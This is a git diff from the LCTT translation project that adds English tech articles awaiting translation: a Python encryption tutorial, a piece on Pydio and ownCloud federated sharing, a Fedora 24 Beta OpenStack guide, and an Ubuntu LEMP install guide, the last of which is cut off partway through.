+With that culture established, though, effective collaboration is crucial. A collaboration platform is an essential element of collaborating at scale because it streamlines productivity and reduces redundancy and effort, and yields higher quality results at the same time.
+
+
+--------------------------------------------------------------------------------
+
+via: http://devops.com/2016/05/16/scaling-collaboration-devops/
+
+作者:[TONY BRADLEY][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://devops.com/author/tonybsg/
+[1]: http://devops.com/2014/12/15/four-strategies-supporting-devops-collaboration/
+[2]: https://451research.com/
+[3]: https://451research.com/customer-insight-voice-of-the-enterprise-overview
+[4]: http://devops.com/events/analytics-of-collaboration-on-github/
diff --git a/sources/tech/20160518 Python 3: An Intro to Encryption.md b/sources/tech/20160518 Python 3: An Intro to Encryption.md
new file mode 100644
index 0000000000..f80702a771
--- /dev/null
+++ b/sources/tech/20160518 Python 3: An Intro to Encryption.md
@@ -0,0 +1,279 @@
+[Translating by cposture]
+Python 3: An Intro to Encryption
+===================================
+
+Python 3 doesn’t have very much in its standard library that deals with encryption. Instead, you get hashing libraries. We’ll take a brief look at those in the chapter, but the primary focus will be on the following 3rd party packages: PyCrypto and cryptography. We will learn how to encrypt and decrypt strings with both of these libraries.
+
+---
+
+### Hashing
+
+If you need secure hashes or message digest algorithms, then Python’s standard library has you covered in the **hashlib** module. It includes the FIPS secure hash algorithms SHA1, SHA224, SHA256, SHA384, and SHA512 as well as RSA’s MD5 algorithm. Python also supports the adler32 and crc32 hash functions, but those are in the **zlib** module.
+
+One of the most popular uses of hashes is storing the hash of a password instead of the password itself. Of course, the hash has to be a good one or it can be decrypted. Another popular use case for hashes is to hash a file and then send the file and its hash separately. Then the person receiving the file can run a hash on the file to see if it matches the hash that was sent. If it does, then that means no one has changed the file in transit.
+
+
+Let’s try creating an md5 hash:
+
+```
+>>> import hashlib
+>>> md5 = hashlib.md5()
+>>> md5.update('Python rocks!')
+Traceback (most recent call last):
+ File "", line 1, in
+ md5.update('Python rocks!')
+TypeError: Unicode-objects must be encoded before hashing
+>>> md5.update(b'Python rocks!')
+>>> md5.digest()
+b'\x14\x82\xec\x1b#d\xf6N}\x16*+[\x16\xf4w'
+```
+
+Let’s take a moment to break this down a bit. First off, we import **hashlib** and then we create an instance of an md5 HASH object. Next we add some text to the hash object and we get a traceback. It turns out that to use the md5 hash, you have to pass it a byte string instead of a regular string. So we try that and then call it’s **digest** method to get our hash. If you prefer the hex digest, we can do that too:
+
+```
+>>> md5.hexdigest()
+'1482ec1b2364f64e7d162a2b5b16f477'
+```
+
+There’s actually a shortcut method of creating a hash, so we’ll look at that next when we create our sha512 hash:
+
+```
+>>> sha = hashlib.sha1(b'Hello Python').hexdigest()
+>>> sha
+'422fbfbc67fe17c86642c5eaaa48f8b670cbed1b'
+```
+
+As you can see, we can create our hash instance and call its digest method at the same time. Then we print out the hash to see what it is. I chose to use the sha1 hash as it has a nice short hash that will fit the page better. But it’s also less secure, so feel free to try one of the others.
+
+---
+
+### Key Derivation
+
+Python has pretty limited support for key derivation built into the standard library. In fact, the only method that hashlib provides is the **pbkdf2_hmac** method, which is the PKCS#5 password-based key derivation function 2. It uses HMAC as its psuedorandom function. You might use something like this for hashing your password as it supports a salt and iterations. For example, if you were to use SHA-256 you would need a salt of at least 16 bytes and a minimum of 100,000 iterations.
+
+As a quick aside, a salt is just random data that you use as additional input into your hash to make it harder to “unhash” your password. Basically it protects your password from dictionary attacks and pre-computed rainbow tables.
+
+Let’s look at a simple example:
+
+```
+>>> import binascii
+>>> dk = hashlib.pbkdf2_hmac(hash_name='sha256',
+ password=b'bad_password34',
+ salt=b'bad_salt',
+ iterations=100000)
+>>> binascii.hexlify(dk)
+b'6e97bad21f6200f9087036a71e7ca9fa01a59e1d697f7e0284cd7f9b897d7c02'
+```
+
+Here we create a SHA256 hash on a password using a lousy salt but with 100,000 iterations. Of course, SHA is not actually recommended for creating keys of passwords. Instead you should use something like **scrypt** instead. Another good option would be the 3rd party package, bcrypt. It is designed specifically with password hashing in mind.
+
+---
+
+### PyCryptodome
+
+The PyCrypto package is probably the most well known 3rd party cryptography package for Python. Sadly PyCrypto’s development stopping in 2012. Others have continued to release the latest version of PyCryto so you can still get it for Python 3.5 if you don’t mind using a 3rd party’s binary. For example, I found some binary Python 3.5 wheels for PyCrypto on Github (https://github.com/sfbahr/PyCrypto-Wheels).
+
+Fortunately there is a fork of the project called PyCrytodome that is a drop-in replacement for PyCrypto. To install it for Linux, you can use the following pip command:
+
+
+```
+pip install pycryptodome
+```
+
+Windows is a bit different:
+
+```
+pip install pycryptodomex
+```
+
+If you run into issues, it’s probably because you don’t have the right dependencies installed or you need a compiler for Windows. Check out the PyCryptodome [website][1] for additional installation help or to contact support.
+
+Also worth noting is that PyCryptodome has many enhancements over the last version of PyCrypto. It is well worth your time to visit their home page and see what new features exist.
+
+### Encrypting a String
+
+Once you’re done checking their website out, we can move on to some examples. For our first trick, we’ll use DES to encrypt a string:
+
+```
+>>> from Crypto.Cipher import DES
+>>> key = 'abcdefgh'
+>>> def pad(text):
+ while len(text) % 8 != 0:
+ text += ' '
+ return text
+>>> des = DES.new(key, DES.MODE_ECB)
+>>> text = 'Python rocks!'
+>>> padded_text = pad(text)
+>>> encrypted_text = des.encrypt(text)
+Traceback (most recent call last):
+ File "", line 1, in
+ encrypted_text = des.encrypt(text)
+ File "C:\Programs\Python\Python35-32\lib\site-packages\Crypto\Cipher\blockalgo.py", line 244, in encrypt
+ return self._cipher.encrypt(plaintext)
+ValueError: Input strings must be a multiple of 8 in length
+>>> encrypted_text = des.encrypt(padded_text)
+>>> encrypted_text
+b'>\xfc\x1f\x16x\x87\xb2\x93\x0e\xfcH\x02\xd59VQ'
+```
+
+This code is a little confusing, so let’s spend some time breaking it down. First off, it should be noted that the key size for DES encryption is 8 bytes, which is why we set our key variable to a size letter string. The string that we will be encrypting must be a multiple of 8 in length, so we create a function called **pad** that can pad any string out with spaces until it’s a multiple of 8. Next we create an instance of DES and some text that we want to encrypt. We also create a padded version of the text. Just for fun, we attempt to encrypt the original unpadded variant of the string which raises a **ValueError**. Here we learn that we need that padded string after all, so we pass that one in instead. As you can see, we now have an encrypted string!
+
+Of course the example wouldn’t be complete if we didn’t know how to decrypt our string:
+
+```
+>>> des.decrypt(encrypted_text)
+b'Python rocks! '
+```
+
+Fortunately, that is very easy to accomplish as all we need to do is call the **decrypt** method on our des object to get our decrypted byte string back. Our next task is to learn how to encrypt and decrypt a file with PyCrypto using RSA. But first we need to create some RSA keys!
+
+### Create an RSA Key
+
+If you want to encrypt your data with RSA, then you’ll need to either have access to a public / private RSA key pair or you will need to generate your own. For this example, we will just generate our own. Since it’s fairly easy to do, we will do it in Python’s interpreter:
+
+```
+>>> from Crypto.PublicKey import RSA
+>>> code = 'nooneknows'
+>>> key = RSA.generate(2048)
+>>> encrypted_key = key.exportKey(passphrase=code, pkcs=8,
+ protection="scryptAndAES128-CBC")
+>>> with open('/path_to_private_key/my_private_rsa_key.bin', 'wb') as f:
+ f.write(encrypted_key)
+>>> with open('/path_to_public_key/my_rsa_public.pem', 'wb') as f:
+ f.write(key.publickey().exportKey())
+```
+
+First we import **RSA** from **Crypto.PublicKey**. Then we create a silly passcode. Next we generate an RSA key of 2048 bits. Now we get to the good stuff. To generate a private key, we need to call our RSA key instance’s **exportKey** method and give it our passcode, which PKCS standard to use and which encryption scheme to use to protect our private key. Then we write the file out to disk.
+
+Next we create our public key via our RSA key instance’s **publickey** method. We used a shortcut in this piece of code by just chaining the call to exportKey with the publickey method call to write it to disk as well.
+
+### Encrypting a File
+
+Now that we have both a private and a public key, we can encrypt some data and write it to a file. Here’s a pretty standard example:
+
+```
+from Crypto.PublicKey import RSA
+from Crypto.Random import get_random_bytes
+from Crypto.Cipher import AES, PKCS1_OAEP
+
+with open('/path/to/encrypted_data.bin', 'wb') as out_file:
+ recipient_key = RSA.import_key(
+ open('/path_to_public_key/my_rsa_public.pem').read())
+ session_key = get_random_bytes(16)
+
+ cipher_rsa = PKCS1_OAEP.new(recipient_key)
+ out_file.write(cipher_rsa.encrypt(session_key))
+
+ cipher_aes = AES.new(session_key, AES.MODE_EAX)
+ data = b'blah blah blah Python blah blah'
+ ciphertext, tag = cipher_aes.encrypt_and_digest(data)
+
+ out_file.write(cipher_aes.nonce)
+ out_file.write(tag)
+ out_file.write(ciphertext)
+```
+
+The first three lines cover our imports from PyCryptodome. Next we open up a file to write to. Then we import our public key into a variable and create a 16-byte session key. For this example we are going to be using a hybrid encryption method, so we use PKCS#1 OAEP, which is Optimal asymmetric encryption padding. This allows us to write a data of an arbitrary length to the file. Then we create our AES cipher, create some data and encrypt the data. This will return the encrypted text and the MAC. Finally we write out the nonce, MAC (or tag) and the encrypted text.
+
+As an aside, a nonce is an arbitrary number that is only used for crytographic communication. They are usually random or pseudorandom numbers. For AES, it must be at least 16 bytes in length. Feel free to try opening the encrypted file in your favorite text editor. You should just see gibberish.
+
+Now let’s learn how to decrypt our data:
+
+```
+from Crypto.PublicKey import RSA
+from Crypto.Cipher import AES, PKCS1_OAEP
+
+code = 'nooneknows'
+
+with open('/path/to/encrypted_data.bin', 'rb') as fobj:
+ private_key = RSA.import_key(
+ open('/path_to_private_key/my_rsa_key.pem').read(),
+ passphrase=code)
+
+ enc_session_key, nonce, tag, ciphertext = [ fobj.read(x)
+ for x in (private_key.size_in_bytes(),
+ 16, 16, -1) ]
+
+ cipher_rsa = PKCS1_OAEP.new(private_key)
+ session_key = cipher_rsa.decrypt(enc_session_key)
+
+ cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)
+ data = cipher_aes.decrypt_and_verify(ciphertext, tag)
+
+print(data)
+```
+
+If you followed the previous example, this code should be pretty easy to parse. In this case, we are opening our encrypted file for reading in binary mode. Then we import our private key. Note that when you import the private key, you must give it your passcode. Otherwise you will get an error. Next we read in our file. You will note that we read in the private key first, then the next 16 bytes for the nonce, which is followed by the next 16 bytes which is the tag and finally the rest of the file, which is our data.
+
+Then we need to decrypt our session key, recreate our AES key and decrypt the data.
+
+You can use PyCryptodome to do much, much more. However we need to move on and see what else we can use for our cryptographic needs in Python.
+
+---
+
+### The cryptography package
+
+The **cryptography** package aims to be “cryptography for humans” much like the **requests** library is “HTTP for Humans”. The idea is that you will be able to create simple cryptographic recipes that are safe and easy-to-use. If you need to, you can drop down to low=level cryptographic primitives, which require you to know what you’re doing or you might end up creating something that’s not very secure.
+
+If you are using Python 3.5, you can install it with pip, like so:
+
+```
+pip install cryptography
+```
+
+You will see that cryptography installs a few dependencies along with itself. Assuming that they all completed successfully, we can try encrypting some text. Let’s give the **Fernet** symmetric encryption algorithm. The Fernet algorithm guarantees that any message you encrypt with it cannot be manipulated or read without the key you define. Fernet also support key rotation via **MultiFernet**. Let’s take a look at a simple example:
+
+```
+>>> from cryptography.fernet import Fernet
+>>> cipher_key = Fernet.generate_key()
+>>> cipher_key
+b'APM1JDVgT8WDGOWBgQv6EIhvxl4vDYvUnVdg-Vjdt0o='
+>>> cipher = Fernet(cipher_key)
+>>> text = b'My super secret message'
+>>> encrypted_text = cipher.encrypt(text)
+>>> encrypted_text
+(b'gAAAAABXOnV86aeUGADA6mTe9xEL92y_m0_TlC9vcqaF6NzHqRKkjEqh4d21PInEP3C9HuiUkS9f'
+ b'6bdHsSlRiCNWbSkPuRd_62zfEv3eaZjJvLAm3omnya8=')
+>>> decrypted_text = cipher.decrypt(encrypted_text)
+>>> decrypted_text
+b'My super secret message'
+```
+
+First off we need to import Fernet. Next we generate a key. We print out the key to see what it looks like. As you can see, it’s a random byte string. If you want, you can try running the **generate_key** method a few times. The result will always be different. Next we create our Fernet cipher instance using our key.
+
+Now we have a cipher we can use to encrypt and decrypt our message. The next step is to create a message worth encrypting and then encrypt it using the **encrypt** method. I went ahead and printed our the encrypted text so you can see that you can no longer read the text. To **decrypt** our super secret message, we just call decrypt on our cipher and pass it the encrypted text. The result is we get a plain text byte string of our message.
+
+---
+
+### Wrapping Up
+
+This chapter barely scratched the surface of what you can do with PyCryptodome and the cryptography packages. However it does give you a decent overview of what can be done with Python in regards to encrypting and decrypting strings and files. Be sure to read the documentation and start experimenting to see what else you can do!
+
+---
+
+### Related Reading
+
+PyCrypto Wheels for Python 3 on [github][2]
+
+PyCryptodome [documentation][3]
+
+Python’s Cryptographic [Services][4]
+
+The cryptography package’s [website][5]
+
+------------------------------------------------------------------------------
+
+via: http://www.blog.pythonlibrary.org/2016/05/18/python-3-an-intro-to-encryption/
+
+作者:[Mike][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.blog.pythonlibrary.org/author/mld/
+[1]: http://pycryptodome.readthedocs.io/en/latest/
+[2]: https://github.com/sfbahr/PyCrypto-Wheels
+[3]: http://pycryptodome.readthedocs.io/en/latest/src/introduction.html
+[4]: https://docs.python.org/3/library/crypto.html
+[5]: https://cryptography.io/en/latest/
diff --git a/sources/tech/20160519 The future of sharing: integrating Pydio and ownCloud.md b/sources/tech/20160519 The future of sharing: integrating Pydio and ownCloud.md
new file mode 100644
index 0000000000..0461fda34d
--- /dev/null
+++ b/sources/tech/20160519 The future of sharing: integrating Pydio and ownCloud.md
@@ -0,0 +1,65 @@
+The future of sharing: integrating Pydio and ownCloud
+=========================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BIZ_darwincloud_520x292_0311LL.png?itok=5yWIaEDe)
+>Image by :
+opensource.com
+
+The open source file sharing ecosystem accommodates a large variety of projects, each supplying their own solution, and each with a different approach. There are a lot of reasons to choose an open source solution rather than commercial solutions like Dropbox, Google Drive, iCloud, or OneDrive. These solutions offer to take away worries about managing your data but come with certain limitations, including a lack of control and integration into existing infrastructure.
+
+There are quite a few file sharing and sync alternatives available to users, including ownCloud and Pydio.
+
+### Pydio
+
+The Pydio (Put your data in orbit) project was founded by musician Charles du Jeu, who needed a way to share large audio files with his bandmates. [Pydio][1] is a file sharing and sync solution, with multiple storage backends, designed with developers and system administrators in mind. It has over one million downloads worldwide and has been translated into 27 languages.
+
+Open source from the very start, the project grew organically on [SourceForge][2] and now finds its home on [GitHub][3].
+
+The user interface is based on Google's [Material Design][4]. Users can use an existing legacy file infrastructure or set up Pydio with an on-premise approach, and use web, desktop, and mobile applications to manage their assets everywhere. For administrators, the fine-grained access rights are a powerful tool for configuring access to assets.
+
+On the [Pydio community page][5], you will find several resources to get you up to speed quickly. The Pydio website gives some clear guidelines on [how to contribute][6] to the Pydio repositories on GitHub. The [forum][7] includes sections for developers and community.
+
+### ownCloud
+
+[ownCloud][8] has over 8 million users worldwide and is an open source, self-hosted file sync and sharing technology. There are sync clients for all major platforms as well as WebDAV through a web interface. ownCloud has an easy to use interface, powerful administrator tools, and extensive sharing and collaboration features—designed to give users control over their data.
+
+ownCloud's open architecture is extensible via an API and offers a platform for apps. Over 300 applications have been written, featuring capabilities like handling calendar, contacts, mail, music, passwords, notes, and many other types of data. ownCloud provides security, scales from a Raspberry Pi to a cluster with petabytes of storage and millions of users, and is developed by an international community of hundreds of contributors.
+
+### Federated sharing
+
+File sharing is starting to shift toward teamwork, and standardization provides a solid basis for such collaboration.
+
+Federated sharing, a new open standard supported by the [OpenCloudMesh][9] project, is a step in that direction. Among other things, it allows for the sharing of files and folders between servers that support this, like Pydio and ownCloud instances.
+
+First introduced in ownCloud 7, this server-to-server sharing allows you to mount file shares from remote servers, in effect creating your own cloud of clouds. You can create direct share links with users on other servers that support federated cloud sharing.
+
+Implementing this new API allows for deeper integration between storage solutions while maintaining the security, control, and attributes of the original platforms.
+
+"Exchanging and sharing files is something that is essential today and tomorrow," ownCloud founder Frank Karlitschek said. "Because of that, it is important to do this in a federated and distributed way without centralized data silos. The number one design goal [of federated sharing] is to enable sharing in the most seamless and easiest way while protecting the security and privacy of the users."
+
+### What's next?
+
+An initiative like OpenCloudMesh will extend this new open standard of file sharing through cooperation of institutions and companies like Pydio and ownCloud. ownCloud 9 has already introduced the ability for federated servers to exchange user lists, enabling the same seamless auto-complete experience you have with users on your own server. In the future, the idea of having a (federated!) set of central address book servers that can be used to search for others' federated cloud IDs might bring inter-cloud collaboration to an even higher level.
+
+The initiative will undoubtedly contribute to already growing open technical community within which members can easily discuss, develop, and contribute to the "OCM sharing API" as a vendor-neutral protocol. All leading partners of the OCM project are fully committed to the open API design principle and welcome other open source file share and sync communities to participate and join the connected cloud.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/5/sharing-files-pydio-owncloud
+
+作者:[ben van 't ende][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/benvantende
+[1]: https://pydio.com/
+[2]: https://sourceforge.net/projects/ajaxplorer/
+[3]: https://github.com/pydio/
+[4]: https://www.google.com/design/spec/material-design/introduction.html
+[5]: https://pydio.com/en/community
+[6]: https://pydio.com/en/community/contribute
+[7]: https://pydio.com/forum/f
+[8]: https://owncloud.org/
+[9]: https://wiki.geant.org/display/OCM/Open+Cloud+Mesh
diff --git a/sources/tech/20160524 Test Fedora 24 Beta in an OpenStack cloud.md b/sources/tech/20160524 Test Fedora 24 Beta in an OpenStack cloud.md
new file mode 100644
index 0000000000..c550880223
--- /dev/null
+++ b/sources/tech/20160524 Test Fedora 24 Beta in an OpenStack cloud.md
@@ -0,0 +1,77 @@
+Test Fedora 24 Beta in an OpenStack cloud
+===========================================
+
+![](https://major.io/wp-content/uploads/2012/01/fedorainfinity.png)
+
+Although there are a few weeks remaining before [Fedora 24][1] is released, you can test out the Fedora 24 Beta release today! This is a great way to get [a sneak peek at new features][2] and help find bugs that still need a fix.
+
+The [Fedora Cloud][3] image is available for download from your favorite [local mirror][4] or directly from [Fedora’s servers][5]. In this post, I’ll show you how to import this image into an OpenStack environment and begin testing Fedora 24 Beta.
+
+One last thing: this is beta software. It has been reliable for me so far, but your experience may vary. I would recommend waiting for the final release before deploying any mission critical applications on it.
+
+### Importing the image
+
+The older glance client (version 1) allows you to import an image from a URL that is reachable from your OpenStack environment. This is helpful since my OpenStack cloud has a much faster connection to the internet (1 Gbps) than my home does (~ 20 mbps upload speed). However, the functionality to import from a URL was [removed in version 2 of the glance client][6]. The [OpenStackClient][7] doesn’t offer the feature either.
+
+There are two options here:
+
+- Install an older version of the glance client
+- Use Horizon (the web dashboard)
+
+Getting an older version of glance client installed is challenging. The OpenStack requirements file for the liberty release [leaves the version of glance client without a maximum version cap][8] and it’s difficult to get all of the dependencies in order to make the older glance client work.
+
+Let’s use Horizon instead so we can get back to the reason for the post.
+
+### Adding an image in Horizon
+
+Log into the Horizon panel and click Compute > Images. Click + Create Image at the top right of the page and a new window should appear. Add this information in the window:
+
+- **Name**: Fedora 24 Cloud Beta
+- **Image Source**: Image Location
+- **Image Location**: http://mirrors.kernel.org/fedora/releases/test/24_Beta/CloudImages/x86_64/images/Fedora-Cloud-Base-24_Beta-1.6.x86_64.qcow2
+- **Format**: QCOW2 – QEMU Emulator
+- **Copy Data**: ensure the box is checked
+
+When you’re finished, the window should look like this:
+
+![](https://major.io/wp-content/uploads/2016/05/horizon_image.png)
+
+Click Create Image and the images listing should show Saving for a short period of time. Once it switches to Active, you’re ready to build an instance.
+
+### Building the instance
+
+Since we’re already in Horizon, we can finish out the build process there.
+
+On the image listing page, find the row with the image we just uploaded and click Launch Instance on the right side. A new window will appear. The Image Name drop down should already have the Fedora 24 Beta image selected. From here, just choose an instance name, select a security group and keypair (on the Access & Security tab), and a network (on the Networking tab). Be sure to choose a flavor that has some available storage as well (m1.tiny is not enough).
+
+Click Launch and wait for the instance to boot.
+
+Once the instance build has finished, you can connect to the instance over ssh as the fedora user. If your [security group allows the connection][9] and your keypair was configured correctly, you should be inside your new Fedora 24 Beta instance!
+
+Not sure what to do next? Here are some suggestions:
+
+- Update all packages and reboot (to ensure that you are testing the latest updates)
+- Install some familiar applications and verify that they work properly
+- Test out your existing automation or configuration management tools
+- Open bug tickets!
+
+--------------------------------------------------------------------------------
+
+via: https://major.io/2016/05/24/test-fedora-24-beta-openstack-cloud/
+
+作者:[major.io][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://major.io/about-the-racker-hacker/
+[1]: https://fedoraproject.org/wiki/Releases/24/Schedule
+[2]: https://fedoraproject.org/wiki/Releases/24/ChangeSet
+[3]: https://getfedora.org/en/cloud/
+[4]: https://admin.fedoraproject.org/mirrormanager/mirrors/Fedora/24/x86_64
+[5]: https://getfedora.org/en/cloud/download/
+[6]: https://wiki.openstack.org/wiki/Glance-v2-v1-client-compatability
+[7]: http://docs.openstack.org/developer/python-openstackclient/
+[8]: https://github.com/openstack/requirements/blob/stable/liberty/global-requirements.txt#L159
+[9]: https://major.io/2016/05/16/troubleshooting-openstack-network-connectivity/
diff --git a/sources/tech/20160530 Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04.md b/sources/tech/20160530 Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04.md
new file mode 100644
index 0000000000..ef713fff0f
--- /dev/null
+++ b/sources/tech/20160530 Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04.md
@@ -0,0 +1,304 @@
+Translating by strugglingyouth
+
+Install LEMP with MariaDB 10, PHP 7 and HTTP 2.0 Support for Nginx on Ubuntu 16.04
+=====================================================================================
+
+
+The LEMP stack is an acronym which represents is a group of packages (Linux OS, Nginx web server, MySQL\MariaDB database and PHP server-side dynamic programming language) which are used to deploy dynamic web applications and web pages.
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-Nginx-with-FastCGI-on-Ubuntu-16.04.png)
+>Install Nginx with MariaDB 10, PHP 7 and HTTP 2.0 Support on Ubuntu 16.04
+
+This tutorial will guide you on how to install a LEMP stack (Nginx with MariaDB and PHP7) on Ubuntu 16.04 server.
+
+Requirements
+
+[Installation of Ubuntu 16.04 Server Edition][1]
+
+### Step 1: Install the Nginx Web Server
+
+#### 1. Nginx is a modern and resources efficient web server used to display web pages to visitors on the internet. We’ll start by installing Nginx web server from Ubuntu official repositories by using the [apt command line][2].
+
+```
+$ sudo apt-get install nginx
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-Nginx-on-Ubuntu-16.04.png)
+>Install Nginx on Ubuntu 16.04
+
+#### 2. Next, issue the [netstat][3] and [systemctl][4] commands in order to confirm if Nginx is started and binds on port 80.
+
+```
+$ netstat -tlpn
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-Nginx-Network-Port-Connection.png)
+>Check Nginx Network Port Connection
+
+```
+$ sudo systemctl status nginx.service
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-Nginx-Service-Status.png)
+>Check Nginx Service Status
+
+Once you have the confirmation that the server is started you can open a browser and navigate to your server IP address or DNS record using HTTP protocol in order to visit Nginx default web page.
+
+```
+http://IP-Address
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Verify-Nginx-Webpage.png)
+>Verify Nginx Webpage
+
+### Step 2: Enable Nginx HTTP/2.0 Protocol
+
+#### 3. The HTTP/2.0 protocol which is build by default in the latest release of Nginx binaries on Ubuntu 16.04 works only in conjunction with SSL and promises a huge speed improvement in loading web SSL web pages.
+
+To enable the protocol in Nginx on Ubuntu 16.04, first navigate to Nginx available sites configuration files and backup the default configuration file by issuing the below command.
+
+```
+$ cd /etc/nginx/sites-available/
+$ sudo mv default default.backup
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Backup-Nginx-Sites-Configuration-File.png)
+>Backup Nginx Sites Configuration File
+
+#### 4. Then, using a text editor create a new default page with the below instructions:
+
+```
+server {
+ listen 443 ssl http2 default_server;
+ listen [::]:443 ssl http2 default_server;
+
+ root /var/www/html;
+
+ index index.html index.htm index.php;
+
+ server_name 192.168.1.13;
+
+ location / {
+ try_files $uri $uri/ =404;
+ }
+
+ ssl_certificate /etc/nginx/ssl/nginx.crt;
+ ssl_certificate_key /etc/nginx/ssl/nginx.key;
+
+ ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
+ ssl_prefer_server_ciphers on;
+ ssl_ciphers EECDH+CHACHA20:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
+ ssl_dhparam /etc/nginx/ssl/dhparam.pem;
+ ssl_session_cache shared:SSL:20m;
+ ssl_session_timeout 180m;
+ resolver 8.8.8.8 8.8.4.4;
+ add_header Strict-Transport-Security "max-age=31536000;
+ #includeSubDomains" always;
+
+
+ location ~ \.php$ {
+ include snippets/fastcgi-php.conf;
+ fastcgi_pass unix:/run/php/php7.0-fpm.sock;
+ }
+
+ location ~ /\.ht {
+ deny all;
+ }
+
+}
+
+server {
+ listen 80;
+ listen [::]:80;
+ server_name 192.168.1.13;
+ return 301 https://$server_name$request_uri;
+}
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Enable-Nginx-HTTP-2-Protocol.png)
+>Enable Nginx HTTP 2 Protocol
+
+The above configuration snippet enables the use of `HTTP/2.0` by adding the http2 parameter to all SSL listen directives.
+
+Also, the last part of the excerpt enclosed in server directive is used to redirect all non-SSL traffic to SSL/TLS default host. Also, replace the `server_name` directive to match your own IP address or DNS record (FQDN preferably).
+
+#### 5. Once you finished editing Nginx default configuration file with the above settings, generate and list the SSL certificate file and key by executing the below commands.
+
+Fill the certificate with your own custom settings and pay attention to Common Name setting to match your DNS FQDN record or your server IP address that will be used to access the web page.
+
+```
+$ sudo mkdir /etc/nginx/ssl
+$ sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/ssl/nginx.key -out /etc/nginx/ssl/nginx.crt
+$ ls /etc/nginx/ssl/
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Generate-SSL-Certificate-and-Key.png)
+>Generate SSL Certificate and Key for Nginx
+
+#### 6. Also, create a strong DH cypher, which was changed on the above configuration file on `ssl_dhparam` instruction line, by issuing the below command:
+
+```
+$ sudo openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Create-Diffie-Hellman-Key.png)
+>Create Diffie-Hellman Key
+
+#### 7. Once the `Diffie-Hellman` key has been created, verify if Nginx configuration file is correctly written and can be applied by Nginx web server and restart the daemon to reflect changes by running the below commands.
+
+```
+$ sudo nginx -t
+$ sudo systemctl restart nginx.service
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-Nginx-Configuration.png)
+>Check Nginx Configuration
+
+#### 8. In order to test if Nginx uses HTTP/2.0 protocol issue the below command. The presence of `h2` advertised protocol confirms that Nginx has been successfully configured to use HTTP/2.0 protocol. All modern up-to-date browsers should support this protocol by default.
+
+```
+$ openssl s_client -connect localhost:443 -nextprotoneg ''
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Test-Nginx-HTTP-2-Protocol.png)
+>Test Nginx HTTP 2.0 Protocol
+
+### Step 3: Install PHP 7 Interpreter
+
+Nginx can be used with PHP dynamic processing language interpreter to generate dynamic web content with the help of FastCGI process manager obtained by installing the php-fpm binary package from Ubuntu official repositories.
+
+#### 9. In order to grab PHP7.0 and the additional packages that will allow PHP to communicate with Nginx web server issue the below command on your server console:
+
+```
+$ sudo apt install php7.0 php7.0-fpm
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-PHP-7-PHP-FPM-for-Ngin.png)
+>Install PHP 7 and PHP-FPM for Ngin
+
+#### 10. Once the PHP7.0 interpreter has been successfully installed on your machine, start and check php7.0-fpm daemon by issuing the below command:
+
+```
+$ sudo systemctl start php7.0-fpm
+$ sudo systemctl status php7.0-fpm
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Start-Verify-php-fpm-Service.png)
+>Start and Verify php-fpm Service
+
+#### 11. The current configuration file of Nginx is already configured to use PHP FastCGI process manager in order to server dynamic content.
+
+The server block that enables Nginx to use PHP interpreter is presented on the below excerpt, so no further modifications of default Nginx configuration file are required.
+
+```
+location ~ \.php$ {
+ include snippets/fastcgi-php.conf;
+ fastcgi_pass unix:/run/php/php7.0-fpm.sock;
+ }
+```
+
+Below is a screenshot of what instructions you need to uncomment and modify is case of an original Nginx default configuration file.
+
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Enable-PHP-FastCGI-for-Nginx.png)
+>Enable PHP FastCGI for Nginx
+
+#### 12. To test Nginx web server relation with PHP FastCGI process manager create a PHP `info.php` test configuration file by issuing the below command and verify the settings by visiting this configuration file using the below address: `http://IP_or domain/info.php`.
+
+```
+$ sudo su -c 'echo "" |tee /var/www/html/info.php'
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Create-PHP-Info-File.png)
+>Create PHP Info File
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Verify-PHP-FastCGI-Info.png)
+>Verify PHP FastCGI Info
+
+Also check if HTTP/2.0 protocol is advertised by the server by locating the line `$_SERVER[‘SERVER_PROTOCOL’]` on PHP Variables block as illustrated on the below screenshot.
+
